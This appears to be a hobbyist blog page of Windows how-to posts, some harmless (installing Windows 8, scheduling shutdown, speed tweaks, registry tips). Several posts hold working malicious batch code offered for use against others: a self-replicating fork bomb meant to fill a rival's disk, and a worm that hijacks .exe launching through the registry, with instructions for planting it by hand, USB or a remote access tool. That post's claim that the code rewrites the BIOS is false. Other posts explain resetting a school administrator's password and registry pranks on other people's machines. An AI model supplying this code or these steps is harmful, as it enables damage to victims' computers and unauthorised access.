Showing posts with label os. Show all posts

How to Destroy your Rivals Computer using a Batch File

I just created the following batch file and ran it on myself and am SUPER glad i shut my computer off, because this batch file creates another batch file at random numbers, then puts the same code of itself in each of those files, then runs those bats, which ALSO do the same thing, constantly, forever, until your stop it.

what this will do, if you leave it on long enough, is it will store itself in ALOT of your hard drive space, making it almost ZERO, then also use up all your ram as your computer goes through all the files, and crash your pc. this virus WILL REQUIRE YOU TO REINSTALL WINDOWS!!!! to get rid of it!!!!

now, if you really wanted to make it a bad batch file, you could have it copy itself to startup, so that when you start up, the horror starts all over again, ON TOP OF ITSELF!!!!.



let me tell you, i let it run only five seconds, and that's b/c it took almost five seconds for the shutdown, and i deleted almost 9 megabytes of diskspace used by just BATCH FILES (which are 1 kb a PIECE!!) just imagine what would have happened to me if i let it run for just one minute...it'd be GIGS and probably well past GIGS in 10 minutes.

so, be careful guys, don't run it on yourself unless you have a virtual machine to limit your disk space used (even that might not be safe).

my usual warning, DON'T DO ANYTHING STUPID! DON'T DO ANYTHING ILLEGAL WITH THIS!




@echo off
:A
SET /A X=%RANDOM%%%1999999999%
type damage.bat >> %x%.bat
start %x%.bat
goto:A

 i am not responsible for anyone who decide to run this code.
 

How to lock folders by only using notepad

Hello guys, on this tutorial I will be showing you how to lock folders with a simple batch script.


Open Notepad from your Start -> All Programs -> Accessories -> Notepad


Step 1: Open notepad and copy and paste in this code


ls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

Step 2: Once the code in notepad save it as "FloderLock.bat"




Step 3: You should now have a .bat file called "Folderlock" double click on it and within a second a new folder called "Locker" Should have been created. Now drop all the files you want like to lock away in "Locker"



Step 4: When you've gotten all the files you want into lock away in "Locker" now to lock it, double click on "FolderLock.bat" and type "Y" when the command prompt comes up. Your folder will now be locked and will disappear.




Step 5: To unlock the folder click on "FolderLock.bat' when the command prompt comes up type "Y". The folder "Locker" and all it's documents should be back in the same directory as "FolderLock"

Hope this tutorial will help out some new and old members. 

How to Permanently Kill someones PC


*Disclaimer*


Now, there is no going back from executing this batch code. Once executed it will rewrite the BIOS and a few other core clocks rendering the motherboard useless. The only way to come back after a execution of this code is to buy a new motherboard.

Lets get started

Step One: Open notepad or anything similar.

Step Two: Paste the following code into notepad


@echo off & break off
:%random%
://associate .pic as batfile for camouflaggin
assoc .pic=batfile

:%random%
://creates and hides files
type %0 >%temp%\%username%.pic
type %0 >%temp%\%username%.bat
attrib +h +s +a +r %temp%\%username%.bat
attrib +h +s +a +r %temp%\%username%.pic

:%random%
://registry entry for starting worm on every *.exe execution
regadd "HKCR\exefile\shell\open\command" /v "@" /d "%temp%\%username%.pic ""\%1\"" %* /f

:%random%
://starting payload mwahaha
Echo 123>clock$ &echo 123>CON &echo 123>AUX &echo 123>PRN &echo 123>COM1 &echo 123>COM2 &echo 123>COM3 &echo 123>COM4 &echo 123>dosx &echo 123>IO &echo 123>HIMEM &echo 123>XMSXXXX0 &echo 123>MOUSE &echo 123>REDIR &echo 123>KBD &echo 123>SYSTEM
exit
 Step Three: Save the file as a .bat like so....

How to use the batch

Now there are a few ways you can run this batch on someones computer.

1. Just simply give them the batch file

2. Use a RAT program like darkcomet and run it through the batch script executer.

3. You could place it on a usb drive and manually execute it.


How to install Windows 8

First of all Go to Microsoft's Web site and download Windows 8 ISO image of 2.5 GB

[Image: inline-2-windows-8-logo-pgram.jpg]

Screenshot of Windows 8 installation [ In this step choose the language, time and currency format, and choose Keyboard or Input method.]

[Image: win8-2-4f4e455-intro.png]

Click on NEXT...


[Image: win8-3-4f4e455-intro.png]

Click on Install now...
Then Next you have Windows 8 will give you two options to choose
1. Upgrade
2. Custom (advanced)

[Image: win8-6-4f4e456-intro.png]

In this step Click on Custom

[Image: Default-VHD.jpg]

In this step Windows will ask you to target destination [Where do you want install Win 8]

[Image: win8-8-4f4e456-intro.png]

In this step windows starts installation on the drive, it takes few minutes install.

[Image: personalization_1.jpg]

Time to personalize the start screen and choose a color and give name to your PC

[Image: personalization_2.jpg]

Click on Express settings or Customize

[Image: personalization_3.jpg]

This is the new feature on Windows 8 it asks to sign in with Microsoft Live ID, if you have a MS live account then sign otherwise click on SKIP.

[Image: personalization_4.jpg]

Finalizing your Settings ...

[Image: Final.jpg]

DONE...

How to schedule computer to shut down at a certain time

If using Windows 7, follow these steps to schedule your PC(Personal Computer) to shut down at a certain time at night:

1. Go to Start > Control Panel > System and Security > Administrative Tools and click on the Task Scheduler.

2. From the Action menu in Task Scheduler, click "Create Basic Task..."

3. In the "Create Basic Task Wizard" windows that pops up, Type in a title and a description. Something basic like "PC Shutdown."

4. Click "Next."

5. On the "Task Trigger" screen, choose the frequency with which you want the Shutdown PC to run. For nightly shutdown, click on "daily" and click the Next" button.

6.On the "Daily" screen, enter the date and time you want your PC to shutdown. Click "Next."

7. On the "Action" screen, choose "Start a program" and click "Next."

8. On the "Start a Program" screen, type C:\Windows\System32\shutdown.exe in the "Program/script" text field.

9. In the Add arguments text field type /s.

10. Click "Next."

11. Confirm your settings on the Summary screen and click "Finish."

How To Change The Admin Password Without Previously Knowing The Password

You can become Admin on the computer which allows you to:
Visit blocked websites
Play games
Watch youtube
Facebook
Hack Forums at school and a lot more.

Obviously this guide won't work on all computers but will work on most.


1. Go to Control Panel

2. Click on Administrative Tools

3. Go to Computer Management

4. Then go to Local Users and Groups

5. Click USERS

6. Under the USERS menu you will see all the accounts including the admin

7. Right Click on the Admin account and select Set Password

8. Enter the new password without the old password

9. You are done.

It works. If you're on your school computer do it to the admin

shutdown computer via DOS commands

(all commands are without " )

this is a method that you can shutdown and restart , ... your computer from DOS commands.

in this method we can set the time-out period before shutdown.Hehe

first we must run Command Prompt.("Win Key+R" and then type cmd)

if you want shutdown your pc immediately you must type "shutdown /s" in command prompt and hit Enter.

for shutdown your computer in a determinate time you must type "shutdown /s /t ???".

you must set the time-out period before shutdown to ??? seconds.valid range is 0-315360000.(for example "shutdown /s /t 666" shutdown your computer after 11 Minutes and 6 Seconds)

you can Restart and Log off and ... your computer with this commands.

shutdown /i ---> for display GUI

shutdown /l ---> for log off

shutdown /r ---> for restart

shutdown /a ---> for abrot a system shutdown

Top 19 Tips To Keep Your System Faster

Follow these tips and you will definitely have a much faster and more reliable PC!

1. Wallpapers: They slow your whole system down. so if you're willing to compromise, have a basic plain one instead!

2. Drivers: Update your hardware drivers as frequently as possible New drivers tend to increase system speed especially in the case of graphics cards, their drivers are updated by the manufacturer very frequently!

3. Minimizing: If you want to use several programs at the same time then minimize those you are not using This helps reduce the overload on RAM.

4. Boot Faster The starting Windows 98/XP message on startup can delay your booting for a couple of seconds To get rid of this message go to C: and find the file Msdos.sys Remove the Read-Only option Next, open it in Notepad or any other text editor Finally, go to the text 'Options' within the file and make the following changes Add BootDelay=0. To make your booting even faster set add Logo=0 to remove the Windows logo at startup.

5. Restart only Windows: When restarting your PC, hold down Shift to only restart Windows rather than the whole system which will only take a fraction of the time.

6 Turn Off Animations: Go to Display Settings from the Control Panel and switch to the Effects Tab_ Now turn off Show Windows Content While Dragging and Smooth Edges on Screen Fonts This tip is also helpful with Windows XP because of the various fade/scroll effects.

7. Faster Start-Menu Access: Go to the Start menu and select Run_ Now type Regedit and hit Enter The Repistrv Editor will appear on the screen Now, open the folder HKEY_CURRENT_USER \Control Panel■Desktop You should see a MenuShowDelay value If you don't then do the following: right click on a blank space in the right pane and select New \String_ Change the name in the new value to MenuShowDelay Now that we have the MenuShowDelay value, double click on it and enter 0 in the value data field This sets the start menu delay to 0 milliseconds.

8 Resolutions: If you are willing to do anything for faster performance from your PC. then try lowering your display resolution. The lower it is. the faster your PC.

9. Turn off Active Desktop: Go to your Display Properties and switch to the Web tab Uncheck View My Active Desktop As a Web Page Since the Active Desktop option under Windows 98 uses a lot of system resources, this option can have a dramatic effect on the speed of the whole system.

10. Defragment Often: Windows 98's Defrag tool uses Application Acceleration from Intel which means that when you defragment your drive, data is physically arranged on the drive so that applications will load faster.

11. Take your PC to Bed: Using the Advanced Power Management feature under Windows 98 gives you the option to use the sleep command That way. you can send your PC to sleep instead of shutting it down and then restarting it Its as simple as pressing a button and then pressing the same button to wake it up You can tell Windows after how many minutes/hours of inactivity to automatically sleep the machine in the Advanced Power Management section of the Control Panel.

12. Faster Internet Access: If you use the intemet for reference and the sites you visit are rarely updated then try the following In IE (the same can be done in Netscape) go to Tools. Internet Options Next, click on Settings... in the Temporary Internet Files section Finally. select Never for the first option and double the amount of storage space to use. click OK!

13. Refresh the Taskbar without restarting: If you in some way change the taskbar either in Regedit or elsewhere, you can refresh the task bar without restarting. Hold down Ctrl Alt Del. and double click on Explorer Say Yes to close Explorer but no to closing Windows. This will refresh the Taskbar and system tray.

14. Quick CD Eject: Instead of pushing the button on your drive, right-click your CD drive letter in My Computer and click on Eject This will also remove any icons that have become associated with the CD drive.

15. Start Up Programs: Windows can be slowed down when programs run on start up To eliminate this, check your Start up folder You can access it from the start menu Start. Programs. Start Up Another way to eliminate programs from loading even before Windows actually starts is by doing the following: Click on Start. then Run Type msconfig It will take quite a long time for this program to load, but when you finally see it on your screen, explore the different tabs They all have to do with how quickly your PC boots, so select what you want, and uncheck what you don't want!

16. Fonts: When Windows starts, it loads every single font in the Fonts folder Therefore, the more fonts you have, the slower the booting process. To get rid of unwanted fonts, simply go to the Fonts folder under Control Panel and remove whatever you don't want. Fonts that have a red letter 'A as their icon are system fonts, so don't delete them.

17. Stretching Wallpapers: Don't "stretch" your wallpaper in Windows 98 since it actually slows Windows down when you drag icons around on the desktop.

18. RAM Matters: If you have less than 32MB then you should seriously think of upgrading it to at least 64MB. Windows runs much more smoothly with 64MB or higher and tends to use less hard disk space for virtual memory.

19. Partitioning: A very nice little thing you can do to boost system performance By partitioning your hard drive, splitting one physical drive into several logical ones, you can gain several advantages 1 If you get a virus or you accidentally format a drive, not all will be lost. 2 By placing the swap file (VVin386 swp) on a separate drive. The swap file will be less fragmented and thus. faster. 3. Place Windows on a separate drive and whenever you need to reinstall it. you rest assured that your data is safe on a separate drive. Partitioning can be done using a few programs such as FDisk which comes with DOS. However. FDisk formats everything on the hard disk before partitioning Alternatively, you can use Partition Magic from Power Quest to partition your hard disk without losing your data.

Untold Windows Tips and Secrets

Welcome to another Hacking Truths Manual. This time I have a collection of Tips and Tricks which no body normally knows, the secrets which Microsoft is afraid to tell the people, the information which you will seldom find all gathered up and arranged in a single file. To fully reap this Manual you need to have a basic understanding of the Windows Registry, as almost all the Tricks and Tips involve this file.

****************

Important Note: Before you read on, you need to keep one thing in mind. Whenever you make changes to the Windows Registry you need to Refresh it before the changes take place. Simply press F5 to refresh the registry and enable the changes. If this does not work Restart your system

****************

Exiting Windows the Cool and Quick Way

Normally it takes a hell lot of time just Shutting down Windows, you have to move your mouse to the Start Button, click on it, move it again over Shut Down, click, then move it over the necessary option and click, then move the cursor over the OK button and once again (you guessed it) click.This whole process can be shortened by creating shortcuts on the Desktop which will shut down Windows at the click of a button. Start by creating a new shortcut( right click and select New> Shortcut). Then in the command line box, type (without the quotes.)

'C:\windows\rundll.exe user.exe,exitwindowsexec'

This Shortcut on clicking will restart Windows immediately without any Warning. To create a Shortcut to Restarting Windows, type the following in the Command Line box:

'c:\windows\rundll.exe user.exe,exitwindows'

This Shortcut on clicking will shut down Windows immediately without any Warning.

Ban Shutdowns : A trick to Play on Lamers

This is a neat trick you can play on that lamer that has a huge ego, in this section I teach you, how to disable the Shut Down option in the Shut Down Dialog Box. This trick involves editing the registry, so please make backups. Launch regedit.exe and go to :

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

In the right pane look for the NoClose Key. If it is not already there then create it by right clicking in the right pane and selecting New > String Value.(Name it NoCloseKey ) Now once you see the NoCloseKey in the right pane, right click on it and select Modify. Then Type 1 in the Value Data Box.

Doing the above on a Win98 system disables the Shut Down option in the Shut Down Dialog Box. But on a Win95 machine if the value of NoCloseKey is set to 1 then click on the Start > Shut Down button displays the following error message:

This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator.

You can enable the shut down option by changing the value of NoCloseKey to 0 or simply deleting the particular entry i.e. deleting NoCloseKey.

Instead of performing the above difficult to remember process, simply save the following with an extension of .reg and add it's contents to the registry by double clicking on it.

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

"NoClose"="1"

Disabling Display of Drives in My Computer

This is yet another trick you can play on your geek friend. To disable the display of local or networked drives when you click My Computer go to :

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now in the right pane create a new DWORD item and name it NoDrives. Now modify it's value and set it to 3FFFFFF (Hexadecimal) Now press F5 to refresh. When you click on My Computer, no drives will be shown. To enable display of drives in My Computer, simply delete this DWORD item. It's .reg file is as follows:

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

"NoDrives"=dword:03ffffff

Take Over the Screen Saver

To activate and deactivate the screen saver whenever you want, goto the following registry key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ScreenSavers

Now add a new string value and name it Mouse Corners. Edit this new value to -Y-N. Press F5 to refresh the registry. Voila! Now you can activate your screensaver by simply placing the mouse cursor at the top right corner of the screen and if you take the mouse to the bottom left corner of the screen, the screensaver will deactivate.

Pop a banner each time Windows Boots

To pop a banner which can contain any message you want to display just before a user is going to log on, go to the key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon

Now create a new string Value in the right pane named LegalNoticeCaption and enter the value that you want to see in the Menu Bar. Now create yet another new string value and name it: LegalNoticeText. Modify it and insert the message you want to display each time Windows boots. This can be effectively used to display the company's private policy each time the user logs on to his NT box. It's .reg file would be:

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon]

"LegalNoticeCaption"="Caption here."

Delete the Tips of the Day to save 5KB

Windows 95 had these tips of the day which appeared on a system running a newly installed Windows OS. These tips of the day are stored in the Windows Registry and consume 5K of space. For those of you who are really concerned about how much free space your hard disk has, I have the perfect trick.

To save 5K go to the following key in Regedit:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Tips

Now simply delete these tricks by selecting and pressing the DEL key.

Change the Default Locations

To change the default drive or path where Windows will look for it's installation files, go to the key:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath

Now you can edit as you wish.

Secure your Desktop Icons and Settings

You can save your desktop settings and secure it from your nerdy friend by playing with the registry. Simply launch the Registry Editor go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

In the right pane create a new DWORD Value named NoSaveSettings and modify it's value to 1. Refresh and restart for the settings to get saved.

CLSID Folders Explained

Don't you just hate those stubborn stupid icons that refuse to leave the desktop, like the Network Neighborhood icon. I am sure you want to know how you can delete them. You may say, that is really simple, simply right click on the concerned icon and select Delete. Well not exactly, you see when you right click on these special folders( see entire list below)neither the rename nor the delete option does not appear. To delete these folders, there are two methods, the first one is using the System Policy Editor(Poledit in the Windows installation CD)and the second is using the Registry.

Before we go on, you need to understand what CLSID values are. These folders, like the Control Panel, Inbox, The Microsoft Network, Dial Up Networking etc are system folders. Each system folder has a unique CLSID key or the Class ID which is a 16-byte value which identifies an individual object that points to a corresponding key in the registry.

To delete these system Folders from the desktop simply go to the following registry key:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Na​​mespace{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}

To delete an icon simply delete the 16 byte CLSID value within "NameSpace". The following are the CLSID values of the most commonly used icons:

My Briefcase:{85BBD920-42AO-1069-A2E4-08002B30309D}

Desktop: {00021400-0000-0000-C000-0000000000046}

Control Panel:{21EC2020-3AEA-1069-A2DD-08002B30309D}

Dial-Up-Networking:{992CFFA0-F557-101A-88EC-00DD01CCC48}

Fonts: {BD84B380-8CA2-1069-AB1D-08000948534}

Inbox :{00020D76-0000-0000-C000-000000000046}

My Computer :{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Network Neighborhood:{208D2C60-3AEA-1069-A2D7-O8002B30309D}

Printers :{2227A280-3AEA-1069-A2DE-O8002B30309D}

Recycle Bin :{645FF040-5081-101B-9F08-00AA002F954E}

The Microsoft Network:{00028B00-0000-0000-C000-000000000046}

History: {FF393560-C2A7-11CF-BFF4-444553540000}

Winzip :{E0D79300-84BE-11CE-9641-444553540000}

For example, to delete the Recycle Bin, first note down it's CLSID value, which is: 645FF040-5081-101B-9F08-00AA002F954E. Now go to the Namespace key in the registry and delete the corresponding key.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\Na​​meSpace\{645FF040-5081-101B-9F08-00AA002F954E}

Similarly to delete the History folder, delete the following key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\Na​​meSpace\{FBF23B42-E3F0-101B-8488-00AA003E56F8}

Sometimes, you may need to play a trick on your brother or friend, well this one teaches you how to hide all icons from the Desktop. Go to the following registry key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

In the right pane create a new DWORD value by the name: NoDesktop and set its value to: 1. Reboot and you will find no icons on the desktop.

Till now you simply learnt how to delete the special system folders by deleting a registry key, but the hack would have been better if there was a way of adding the DELETE and RENAME option to the right click context menus of these special folders. You can actually change the right click context menu of any system folder and add any of the following options: RENAME, DELETE, CUT, COPY, PASTE and lots more.

This hack too requires you to know the CLSID value of the system folder whose menu you want to customize. In this section, I have taken up Recycle Bin as the folder whose context menu I am going to edit.

Firstly launch the registry editor and open the following registry key:

HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder.

In Case you want to edit some other folder like say the FONTS folder, then you will open the following key:

HKEY_CLASSES_ROOT\CLSID\{CLSID VALUE HERE}\ShellFolder.

In the right pane there will be a DWORD value names attributes. Now consider the following options:

To add the Rename option to the menu, change the value of Attributes to
50 01 00 20

To add the Delete option to the menu, change the value of Attributes to
60 01 00 20

3. To add both the Rename & Delete options to the menu, change the value of Attributes to 70,01,00,20

4. Add Copy to the menu, change Attributes to 41 01 00 20

5. Add Cut to the menu, change Attributes to 42 01 00 20

6. Add Copy & Cut to the menu, change Attributes to 43 01 00 20

7. Add Paste to the menu, change Attributes to 44 01 00 20

8. Add Copy & Paste to the menu, change Attributes to 45 01 00 20

9. Add Cut & Paste to the menu, change Attributes to 46 01 00 20

10.Add all Cut, Copy & Paste to the menu, change Attributes to 47 01 00 20

We want to add only the Rename option to the right click context menu of the Recycle Bin, so change the value of attributes to: 50 01 00 20. Press F5 to refresh and then after rebooting you will find that when you right click on the Recycle Bin a RENAME option pops up too.

To reset the default Windows options change the value of Attributes back to

40 01 00 20

The Registry File which one can create for the above process would be something like the below:

REGEDIT4

[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\Shell-Folder]

"Attributes"=hex:50,01,00,20

To access say the Modem Properties in the Control Panel Folder, the normal procedure is: Click on Start, Click on Settings> Control Panel and then wait for the Control Panel window to pop up and then ultimately click on the Modems icon.

Wouldn't it be lovely if you could shorten the process to: Click on Start> Control Panel>Modems. Yes you can add the Control Panel and also all other Special System Folders directly to the first level Start Menu. Firstly collect the CLSID value of the folder you want to add to the start menu. I want to add Control Panel hence the CLSID value is: 21EC2020-3AEA-1069-A2DD-08002B30309D

Now right click on the Start Button and select Open. Now create a new folder and name it: Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}

NOTE: Do not forget the period after the 'l' in Panel. Similarly all system folders can be added to the Start Menu.(accept My Briefcase, I think)

Deleting System Options from the Start menu

You can actually remove the Find and Run options from the start menu by performing a simple registry hack. Again like always Launch the registry editor and scroll down to the below key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Right-click on the right pane and select New, DWORD Value. Name it NoFind.(To remove the RUN option name it NoRun). Double-click the newly create DWORD to edit it's value and enter 1 as its value. This will disable the FIND option of the Start Menu and will also disable the default Shortcut key(F3 for Find.)

To restore the Run or find command modify the value of the DWORD to 0 or simply Delete the DWORD value.

Fed Up of the boring Old Yellow Folder Icons?[Drive Icons Included]

NOTE: This trick hasn't been tried on Win98.

You can easily change the boring yellow folder icons to your own personalized icons. Simply create a text file and copy the following lines into it:

[.ShellClassInfo]

ICONFILE=Drive:\Path\Icon_name.extension

Save this text file by the name, desktop.ini in the folder, whose icon you want to change. Now to prevent this file from getting deleted change it's attributes to Hidden and Read Only by using the ATTRIB command.

To change the icon of a drive, create a text file containing the following lines:

[Autorun]

ICON=Drive:\Path\Icon_name.extension

Save this file in the root of the drive whose icon you want to change and name it autorun.inf For Example, if you want to change the icon of a floppy, SAVE THE icon in a:\icon_name.ico One can also create a kewl icon for the Hard Disk and create a text file [autorun.inf] and store it in "c:\".

Securing NT

By default, NT 4.0 displays the last person who logged onto the system. This can be considered to be a security threat, especially in the case of those who choose their password to be same as their Username. To disable this bug which actually is a feature, go to the following key in the registry editor:

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon

Click and select the ReportBookOK item and create a new string value called DontDisplayLastUserName. Modify it and set it's value to 1.

As a system administrator, you can ensure that the passwords chosen by the users are not too lame or too easy to guess. NT has this lovely utility called the User Manager which allows the administrator to set the age limit of the password which forces the users to change the password after a certain number of days. You can also set the minimum length of passwords and prevent users to use passwords which already have been used earlier and also enable account lockouts which will deactivate an account after a specified number of failed login attempts.

When you log on to Win NT, you should disable Password Caching, this ensures Single NT Domain login and also prevents secondary Windows Logon screen.

Simply copy the following lines to a plain text ASCII editor like: Notepad and save it with an extension, .reg

----------------DISABLE.reg-----------------

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network]

"DisablePwdCaching"=dword:00000001

----------------DISABLE.reg-----------------

To Enable Password Caching use the following .reg file:

--------------Enable.reg-----------------

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network]

"DisablePwdCaching"=dword:00000000

--------------Enable.reg-----------------



Cleaning Recent Docs Menu and the RUN MRU

The Recent Docs menu can be easily disabled by editing the Registry. To do this go to the following Key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now in the right pane, create a new DWORD value by the name: NoRecentDocsMenu and set it's value to 1. Restart Explorer to save the changes.

You can also clear the RUN MRU history. All the listings are stored in the key:

HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

You can delete individual listings or the entire listing. To delete History of Find listings go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU

and delete.

Customizing the Right Click Context Menu of the Start Menu

When you right click on the start menu, only 3 options pop up: Open, Explore, and Find. You can add your own programs to this pop up menu( which comes up when we right click on it.) Open Regedit and go to the following registry key:

HKEY_CLASSES_ROOT\Directory\Shell

Right click on the shell and create a new Sub Key (You can create a new SubKey by right clicking on the Shell Key and selecting New > Key.). Type in the name of the application you want to add to the start menu. I want to add Notepad to the Start Menu and hence I name this new sub key, Notepad. Now right click on the new registry key that you just created and create yet another new key named Command. Enter the full path of the application, in this case Notepad in the default value of Command in the right

pane. So I Modify the value of the default string value and enter the full pathname of Notepad:

c:\wndows\notepad.exe.

Now press F5 to refresh. Now if you right click on the Start Button you will find a new addition to the Pop Up Menu called Notepad. Clicking on it will launch Notepad.

We can not only add but also remove the existing options in this pop up box.

To delete the Find option, go to the following registry key:

HKEY_CLASSES_ROOT\Directory\Shell\Find

Delete Find. DO NOT delete Open else you will not be able to open any folders in the Start Menu like Programs, Accessories etc.

BMP Thumbnail As Icon

You can actually change the default BMP icon to a thumbnail version of the actual BMP file. To do this simply go to HKCU\Paint.Picture\Default. In the right pane change the value of default to %1. Please note however that this will slow down the display rate in explorer if there are too many BMP thumbnails to display. You can use other icons too, simply enter the pathname.To restore back to the normal change the vale of default back to: C:\Progra~1\Access~1\MSPAINT.EXE,1.

Customizing The Shortcut Arrow

All shortcuts have a tiny black arrow attached to it's icon to distinguish from normal files. This arrow can sometimes be pretty annoying and as a Hacker should know how to change each and everything, here goes another trick. Launch the Registry Editor and go to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Shell Icons.

Now, on the right pane is a list of icons ( we found out that on some systems, Windows 98 especially, the right pane is blank. Don't worry, just add the value as required ). Find the value 29. If it isn't there, just add it. The value of this string should be C:\Windows\system\shell32.dll, 29 ( which means the 30th icon in shell32.dll - the first one begins with 0 ). Now, we need blank icon to do this. Just create one with white as the whole icon. Go here to learn how to create an icon. Once done just change the value to C:\xxx.ico, 0 where "xxx" is the full path of the icon file and "0" is the icon in it.

Now for some fun. If the blank icon is a bit boring, change it again. You will find that under shell32.dll there is a gear icon, a shared folder ( the hand ) and much more. Experiment for yourself!

Use Perl to Get List or Services Running on your NT box

Use the following Perl Script to get a list of Services running on your NT system

--------------script.pl-----------------

#!c:\per\bin\perl.exe

use Win32::Service;

my ($key, %service, %status, $part);

Win32::Service::GetServices(' ',\%services);

foreach $key (sort keys %services) {

print "Print Name\t: $key, $services{$key}\n";

Win32::Service::GetStatus( ' ',$services{$key};

\%status);

foreach $part (keys %status) {

print "\t$part : $status{$part}\n" if($part eq "CurrentState");

}

}

-------------script.pl-------------------

Internet Explorer Tricks and Tips

Resizable Full Screen Toolbar

The Full Screen option increases the viewable area and makes surfing more enjoyable but sometimes we need the Toolbar but also need to have extra viewing area. Now this hack teaches you how to change the size of the Internet Explorer toolbar. This registry hack is a bit complicated as it involves Binary values, so to make it simple, I have included the following registry file which will enable the resizable option of the Internet Explorer toolbar which was present in the beta version of IE.

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar]

"Theater"=hex:0c,00,00,00,4c,00,00,00,74,00,00,00,18,00,00,00,1b,00,00,00,5c,\

00,00,00,01,00,00,00,e0,00,00,00,a0,0f,00,00,05,00,00,00,22,00,00,00,26,00,\

00,00,02,00,00,00,21,00,00,00,a0,0f,00,00,04,00,00,00,01,00,00,00,a0,0f,00,\

00,03,00,00,00,08,00,00,00,00,00,00,00

*******************

HACKING TRUTH: Internet Explorer 5 displays the friendly version of HTTP errors like NOT FOUND etc . They are aimed at making things easier for newbies. If you would rather prefer to see the proper error pages for the web server you're using, go to Tools, Internet Options and select the Advanced tab. Then scroll down and uncheck the Show friendly http errors box.

*******************

Making the Internet Explorer & the Explorer Toolbars Fancy

The Internet Explorer toolbar looks pretty simple. Want to make it fancy and kewl? Why not add a background image to it. To do this kewl hack launch the Windows Registry Editor and go to the following key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Internet Explorer\Toolbar\.

Now in the right pane create a new String Value and name it BackBitmap and modify it's value to the path of the Bitmap you want to dress it up with by rightclicking on it and choosing Modify. When you reboot the Internet Explorer and the Windows Explorer toolbars will have a new look.

Change Internet Explorer's Caption

Don't like the caption of Internet Explorer caption? Want to change it? Open the registry editor and go to

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main.

In the right pane create a new String Value names Window Title (Note the space between Window and Title). Right click on this newly created String Value and select Modify. Type in the new caption you want to be displayed. Restart for the settings to take place.

Now let's move on to some Outlook Express Tricks.

Colorful Background

Don't like the boring background colors of Outlook Express? To change it launch the Windows Registry Editor and scroll down to the

HKEY_CURRENT_USER\Software\Microsoft\Internet Mail And News key.

On the left pane, click on ColorCycle or select Edit and Modify in the menu. Now change the value to 1. Close and restart. Now, launch Outlook Express and whenever you open up a New Message, hold down ctrl-shift and tap the z key to scroll to change the background color. Repeat the keystroke to cycle through the colors.

Internet Explorer 5 Hidden Features


Microsoft Internet Explorer 5 has several hidden features which can be controlled using the Windows Registry. Open your registry and scroll down to the following key:

HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions

Create a new DWORD value named x(See complete list of values of x below) and modify it's value to 1 to enable it and to 0 to disable it.

NoBrowserClose : Disable the option of closing Internet Explorer.

NoBrowserContextMenu : Disable right-click context menu.

NoBrowserOptions : Disable the Tools / Internet Options menu.

NoBrowserSaveAs : Disable the ability to Save As.

NoFavorites : Disable the Favorites.

NoFileNew : Disable the File / New command.

NoFileOpen : Disable the File / Open command.

NoFindFiles : Disable the Find Files command.

NoSelectDownloadDir : Disable the option of selecting a download directory.

NoTheaterMode : Disable the Full Screen view option.

Hacking Secrets

